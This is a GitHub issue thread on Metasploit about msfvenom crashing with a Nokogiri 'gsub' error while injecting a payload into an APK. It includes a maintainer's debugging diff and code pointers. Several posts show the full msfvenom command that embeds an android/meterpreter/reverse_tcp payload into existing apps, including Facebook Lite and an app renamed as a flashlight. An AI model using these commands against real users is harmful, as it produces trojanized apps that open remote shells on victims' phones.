### ISSUE TITLE
Error: undefined method `gsub' for []:Nokogiri::XML::NodeSet

### ISSUE THREAD

**Issue by yurelavrik** [rapid7/metasploit-framework#13761]
sudo msfvenom -x LUC.apk -p android/meterpreter/reverse_tcp LHOST=192.168.2.3 LPORT=4444 -o svetilka.apk
Using APK template: LUC.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
Error: undefined method `gsub' for []:Nokogiri::XML::NodeSet

i am lost there is no solution online and i am using kali linux 2020.1 32bit

**Comment by emirbyte** [comment]
Same happens to me too

**Comment by jamshi46** [comment]
Got the Same issue here :(

**Comment by jamshi46** [comment]
Any Fix??

**Comment by dwelch-r7** [comment]
Hey guys, sorry this issue is still causing problems for some of you, would any of you able to provide the exact reproduction steps? On the newest version of metasploit too if at all possible

**Comment by gerardo12-12** [comment]
someone already solved it?

**Comment by bcoles** [comment]
There is not enough information to reproduce this issue. I have no idea which app `LUC.apk` is related to. If someone encounters this issue, please provide a link to the APK file.

My guess is that the `gsub` crash is happening here, where `hookable_class` returned from `find_hook_point` is malformed.

https://github.com/rapid7/metasploit-framework/blob/2560aa394c10476750dcc0ad58cc6746d4a11e5b/lib/msf/core/payload/apk.rb#L254-L256

I was able to introduce a similar error by returning early from `find_hook_point`:

```diff
diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb
index 7dc7f57bc3..2850f039e3 100644
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -38,6 +38,8 @@ class Msf::Payload::Apk
   def find_hook_point(amanifest)
     package = amanifest.xpath("//manifest").first['package']
     application = amanifest.xpath('//application')
+    return application
+
     application_name = application.attribute("name")
     if application_name
       application_str = application_name.to_s
```

```
# ./msfvenom -x apks/facebook_lite_v291.0.0.12.110.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: apks/facebook_lite_v291.0.0.12.110.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
Error: undefined method `gsub' for #<Nokogiri::XML::NodeSet:0x0000558c49c92d38>
```

It seems likely that the issue is caused by `application_name = application.attribute("name")` which causes `find_hook_point` to later return an XML node instead of a string, here:

https://github.com/rapid7/metasploit-framework/blob/2560aa394c10476750dcc0ad58cc6746d4a11e5b/lib/msf/core/payload/apk.rb#L37-L47
